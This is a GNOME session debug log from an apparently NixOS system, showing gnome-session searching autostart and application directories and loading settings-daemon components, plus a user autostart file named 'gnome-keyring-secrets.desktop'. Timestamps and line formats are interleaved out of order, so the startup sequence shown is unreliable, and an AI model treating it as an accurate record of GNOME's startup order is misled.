machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App17 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.XSettings.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Done adding required components
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.config/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Smartcard.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App13 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Smartcard.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Sound.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /home/alice/.config/autostart/gnome-keyring-secrets.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App18 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.nix-profile/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/profile/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.local/state/nix/profile/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /etc/profiles/per-user/alice/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/var/nix/profiles/default/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /run/current-system/sw/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.nix-profile/etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/profile/etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /home/alice/.local/state/nix/profile/etc/xdg/autostart
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /etc/profiles/per-user/alice/etc/xdg/autostart
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /nix/var/nix/profiles/default/etc/xdg/autostart
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: *** Adding autostart apps for /run/current-system/sw/etc/xdg/autostart
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Housekeeping.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Housekeeping.desktop' already exists
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Keyboard.desktop' already exists
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App14 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Sound.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.UsbProtection.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sharing.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.Sharing.desktop' already exists
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop
machine # Aug 02 11:49:36 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: not adding app: app-id 'org.gnome.SettingsDaemon.A11ySettings.desktop' already exists
